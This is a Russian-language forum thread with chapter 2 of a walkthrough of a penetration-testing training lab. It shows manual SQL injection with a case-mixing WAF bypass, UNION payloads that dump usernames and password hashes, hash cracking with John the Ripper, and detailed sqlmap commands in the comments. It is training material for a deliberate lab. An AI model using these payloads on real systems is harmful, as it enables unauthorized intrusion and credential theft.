Лаборатория тестирования на проникновение «Test lab v.10» — за гранью хакерских возможностей (2)

[<~DarkNode~>]

Глава 2​

Предыдущая глава
Следующая глава
Оглавление

И так привет колеги. Сегодня погрузимся дальше в роль хакера пентестера и возьмем свой второй токен. Попадем на машину ssh(172.16.0.8).
Вспоминаем что мы взяли в прошлый раз логин и пароль о почты. Пробуем этот логин и пароль везде где только можно,так использование одинаковых паролей - это одна из самых частых ошибок,которую допускает человек. Но увы этот пароль и логин от почты никуда не подошел,ни к админке к сайту,ни к ssh.Так что давайте ковыряться дальше.
И будем мы сегодня изучать атаку на веб приложение,а если чуть подробнее то поговорим о таком векторе как SQL Injection и обход простенького WAF-а (WAF - Web Application FIrewall).

Прежде чем начать,хотелось бы сказать на что стоит обращать внимания и чем пользоваться при пентесте веб приложения.Исходя из собственного опыта могу смело сказать ,что поиск уязвимостей веб приложения построен на обнаружении аномального поведения веб контента в результате реакции на передаваемые данные в сторону сервера(пользовательский ввод "GET|POST запросы" ,куки,служебные заголовки и т.д) И как вы уже догадались все сканеры уязвимостей построены по этой логики.Но бывают ситуации когда сканеры уязвимости не правильно понимают логику веб приложения и как результат дает не верные отчеты о найденных уязвимостей. К тому же, такие известные утилиты как SQLmap,Acunetix и много им подобные использую в качестве UserAgent-а свое имя,и добавив запрет на такие UserAgent-а можно уже защитится от атак школьниками.А если говорить о каких нибудь более серьезных средствах защитах и различных WAF-ах - то это очень сильно запутает логику работы сканера уязвимостей и как вывод из всего выше сказанного - ручной фаззинг и поиск уязвимостей в разы продуктивней чем работа сканеров.

Именно по этому мы сегодня с вами встретимся один на один с простенькой

Ссылка скрыта от гостей

и простеньким

Ссылка скрыта от гостей

Обычно я использую инструмент BurpSuite для ручного фаззинга,при работе с веб приложениями,но тут все гораздо проще.К тому же по этому инструменту нужно делать отдельный цикл статей)

Ну что же ,давайте посмотрим на наш сайт

Ссылка скрыта от гостей

/ еще разочек под другим ракурсом)

Первым делом проверим наличие админки на сайте:

Дальше потыкаем по постам на главной странице:

У нас есть один передаваемый параметр в GET запросе который отвечает за порядковый номер поста на сайте. Давайте с ним поиграем) По старой доброй привычке ткнем туда кавычку:

Хмм.. Странно но нас редиректнуло на главную страницу... Привычную ошибку синтаксиса не то что бы не видать,а как по первому взгляду - инъекцией и не пахнет скажете вы.Но эпоха админов которые включают вывод ошибок в PHP все потихоньку уходит в прошлое) И по этому весьма логично предположить что в случаи какой то ошибки ,или неправильного ввода пользователем весьма очевидно такое поведения.Все таки предположим что тут есть инъекция и нужно просто попробовать сбалансировать запрос:
Первой стадией при работе с SQL инъекцией является балансировка запроса:
Это нечто иное как найти правильные закрывающие символы в запросе и отрезка не нужной части комментарием,например если выборка с базы данных идет по запросу

$result = mysql_query("SELECT * WHERE id = ('1')");

то балансировка этого запроса представляет собой в GET запросе передаваемым на сервер:
some_url/index.php?id=1') -- -
И правильными закрывающими символами тут будут ')
И как результат вывод должен быть таким же как и при some_url/index.php?id=1.Если запрос не сбалансирован то поведения контента будет разным

Ну что ж давайте играться с параметром id на нашем сайте:

Немножко поигрались - мы уже смогли найти Boolian Blind SQL Injection)
А теперь давайте разберем что мы сделали:
1)Сбалансировали запрос,после добавление правильных символов нас не бросало на главную,а выводился контент страницы которая имеет id=1
2)Попробовали добавить в запрос истинное выражение (and true -- -) и видим что нас перебросило на главную страницу...Хм..Так не должно быть.. Сразу же на ум приходит что тут стоит фильтр на пользовательский ввод.
3)Немного поигравшись с регистром - мы достигаем цели:
1') AnD TruE -- - нас не перебрасывает на главную) Вероятнее всего что фильтр работает только по словам в нижнем или верхнем регистре.
4)
1') AnD FalSe -- -Для закрепление вектора,это означает что если в запросе будет не истинное значение(ложь) или ошибка то нас будет бросать на главную.
Уже можно крутить как слепую булеан блайнд) Но нам еще нужно проверить на Union Based вектор инъекции.
Давайте найдем к-тво столбцов:

Как видем у нас два столбца в запросе,пробуем сделать вывод.Но что бы вывести наш юнион запрос нужно добавить ложь в основной запрос.
id=1') And FalSe UnIoN SeLeCt 11111,2222 -- -

Как видите,есть вывод) Как говорится инжектабельно))))
Давайте крутить дальше)

id=1') And FalSe UnIoN SeLeCt coNcaT(TaBLe_NamE),2222 fRoM InForMaTioN_SchEma.TabLeS WheRe TabLe_SchEma=database() limit 1,1-- -

id=1') And FalSe UnIoN SeLeCt coNcaT(ColuMn_NamE),2222 fRoM InForMaTioN_SchEma.coLuMnS WheRe TabLe_NaMe='users' limit 1,1-- -

id=1') And FalSe UnIoN SeLeCt coNcaT(ColuMn_NamE),2222 fRoM InForMaTioN_SchEma.coLuMnS WheRe TabLe_NaMe='users' limit 2,1-- -

id=1') And FalSe UnIoN SeLeCt coNcaT(username),2222 fRoM users-- -

id=1') And FalSe UnIoN SeLeCt coNcaT(password),2222 fRoM users-- -

на password как видим также WAF,ничего,обойдем:

id=1') And FalSe UnIoN SeLeCt coNcaT(paSSwOrD),2222 fRoM users-- -

И финальный ввывод)

Получаем имя и хеш)
Дальше что бы мне нагло не сливать вам токен , вам придется побрутить хеш)
Брутим хеш,(он пару секунд брутится)
Идем в админку,берем токен. И под этим же логином и паролем попадаем на ssh машину(ssh e.lindsey@192.168.101.9)
пароль из хеша
Дальше будем брать токен на SSH и учится пробрасывать порты.
Всем спасибо

Предыдущая глава
Следующая глава
Оглавление

 

[<~DarkNode~>]

Ну на тот случай если у кого то с брутом проблемы возникли то:

Добавляем в какойто тектстовый файлик следующий контент:

e.lindsey:$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8.

И запускаем команду:

john hashes.txt

И получаем навыходе:

Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
lindsey123       (e.lindsey)
1g 0:00:00:01 DONE 1/3 (2016-12-11 10:55) 0.6535g/s 4422p/s 4422c/s 4422C/s elindsey123..E123
Use the "--show" option to display all of the cracked passwords reliably
Session completed

И у нас есть пароль lindsey123 и логин e.lindsey

Логинимся в админку и забираем токен
затем конектимся к ssh:
ssh e.lindsey@192.168.101.9

И гуляем по ссш:

 

[frostobot]

Чем брутить то нужно было? Мне нашел пароль по хешу этот сервис

Ссылка скрыта от гостей

Я правильно понял, у нашего пользователя нет root-полномочий? Что мы тогда сможем при помощи него сделать? Ждать третьей части?)

 

[<~DarkNode~>]

Я правильно понял, у нашего пользователя нет root-полномочий? Что мы тогда сможем при помощи него сделать? Ждать третьей части?)

Нет конечно))) Вы представляете что бы было если бы был бы рут у всех) Все бы затерали токены и раняли бы сервер)

Брутил я джоном за пару секунд)

 

[sergeyxz]

Спасибо буду учиться...xss

 

[faust]

DarkNode канал Corp_Of_Hack на youtube не твой?

 

[<~DarkNode~>]

DarkNode канал Corp_Of_Hack на youtube не твой?

мой

 

[faust]

Не подскажете почему по ссылке

Ссылка скрыта от гостей

выдает ошибку ssl_error_rx_record_too_long, а по ссылке

Ссылка скрыта от гостей

все нормально. Или на порту 443 обычный http.

 

[di240312]

Спасибо за статью

 

[ghostphisher]

Спасибо за статью! Вопрос:

1) Можно все это раскрутить sqlmap'om?
2) Если да, то какой тампер использовать
3) Подойдет ли для этих целей commix ?

 

[<~DarkNode~>]

Спасибо за статью! Вопрос:

1) Можно все это раскрутить sqlmap'om?
2) Если да, то какой тампер использовать
3) Подойдет ли для этих целей commix ?

--tamper randomcase
Впринципе можно,но он криво крутит и намного дольше чем руками,хотя вектор ним обнаружить можно.

 

[ghostphisher]

--tamper randomcase
Впринципе можно,но он криво крутит и намного дольше чем руками,хотя вектор ним обнаружить можно.

Руки удобнее, спортивнее. Однако если 2, 3 задания исполнять =) И автоматизация иногда выручает.

ПС Ради интереса

sqlmap --random-agent --url

Ссылка скрыта от гостей

--crawl=2 --batch --dbs --level=3 --risk=3 --tamper randomcase --hex

посмотрю сколько времени займет и каков будет итог

Дополняю

ушло 3 минуты, НО


[21:08:24] [ERROR] unable to retrieve the number of databases
[21:08:24] [INFO] falling back to current database
[21:08:24] [INFO] fetching current database
[21:08:25] [INFO] retrieved:
[21:08:25] [ERROR] unable to retrieve the database names, skipping to the next URL

не смог он базы определить, я так понимаю не хватает параметра.

 

[p0ttym4n]

Очень информативно, спасибо за статью)

а какие еще можно встретить препятствия помимио WAF-ов и проверок вводимых параметров?

 

[ghostphisher]

Ради интереса пытаюсь вытащить базы sqlmap'om но вот как то не выходит. Ошибка [ERROR] unable to retrieve the number of databases.
Я перепробовал разные тамперы. Пробовал --hex --nocast, тот же итог. Очень хочется решить эту задачу =) Если кто в курсе, подскажите, чего не хватает.


sqlmap --identify-waf -v3 --random-agent --url

Ссылка скрыта от гостей

--crawl=2 --batch --dbms=mysql --dbs --level=3 --risk=3 --tamper space2mysqlblank --no-cast --threads 10

Изначально было sqlmap --random-agent --url

Ссылка скрыта от гостей

--crawl=2 --batch --dbs --level=3 --risk=3 --tamper randomcase --hex

 

[<~DarkNode~>]

Очень хочется решить эту задачу =) Если кто в курсе, подскажите, чего не хватает.

sqlmap --flush-session --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "

Ссылка скрыта от гостей

*" --technique U -D site --threads 10 --tables --common-tables

--tamper randomcase -- использовать фильтр скульмапа для генерации пейлоада в различном регистре
--random-agent -- использовать случайный UserAgent
--code=200 -- использовать в качестве валидных ответов заголовок ответа 200 ок, 301(редирект) будет распознан как невалидный запрос
--level 5 --использовать маскимальный уровень поиска векторов
--risk 3 почти тоже самое что и --level
--technique U --пытаться использовать только векторы UnionBased SQL injection
--url "

Ссылка скрыта от гостей

*" -- астериксом(*) мы указываем место для инжекта
--prefix -- то что использовать в начале запроса
--suffix -- то что использовать в конце запроса
--threads 10 - к-тво потоков

Ошибка [ERROR] unable to retrieve the number of databases.

--flush-session - очистить сессию скульмапа

 

[ghostphisher]

sqlmap --flush-session --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "

Ссылка скрыта от гостей

*" --technique U -D site --threads 10 --tables --common-tables

Как обычно на отлично!
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?

дополнение:

[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

Но хэша нет...

sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "

Ссылка скрыта от гостей

" --technique U -D site --threads 10 --tables --common-tables -T users --dump

пробовал так. что опять упустил?

 

[<~DarkNode~>]

Как обычно на отлично!
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?

Только в 2 раза меньше таблиц=)

Нашел бы,просто так быстрее, --code=200 тут нужно потому что тут не стандартное поведение контента,тут нету ошибки на вывод,тут есть редирект вместо ошибки. По идеи и без этого параметра должно отработать,но sqlmap - это программа,не стоит забывать,она может не коректно понимать логику поведения страницы,и именно в таких ситуациях лучше использовать такой параметр)

 

[<~DarkNode~>]

[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

Но хэша нет...

sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "

Ссылка скрыта от гостей

" --technique U -D site --threads 10 --tables --common-tables -T users --dump

пробовал так. что опять упустил?

Попробуй сперва найти столбец password в таблице users. Я не помню просто есть ли точно он в common-columns,но должен быть.
Попробуй сначала так:
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "

Ссылка скрыта от гостей

" --technique U -D site --threads 10 -T users --common-columns
А потом
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "

Ссылка скрыта от гостей

" --technique U -D site --threads 10 -T users --dump
Или же просто так:
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "

Ссылка скрыта от гостей

" --technique U -D site --threads 10 -T users -С username,password --dump

 

[<~DarkNode~>]

Вообще,сугубо мое мнение по поводу sqlmap - это утилита которая используется больше как для постэксплуатации sql injection , но не для поиска. Уязвимость находится сперва ,проверяется на наличия WAF-а,изучается поведения вафа, и только потом в бой выходит скульмап)
На своем опыте я встречал такие инъекции которые посылали скульмап куда подальше,но руки никогда не подводили))
Вот пару старых моих видео про работу руками если кому интересно:
[hide=12]

 

[ghostphisher]

Вообще,сугубо мое мнение по поводу sqlmap - это утилита которая используется больше как для постэксплуатации sql injection , но не для поиска. Уязвимость находится сперва ,проверяется на наличия WAF-а,изучается поведения вафа, и только потом в бой выходит скульмап)
На своем опыте я встречал такие инъекции которые посылали скульмап куда подальше,но руки никогда не подводили))

итог тот же
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

что ж, это еще раз доказала про руки и мозг Спасибо за подробные ответы - информация очень полезная.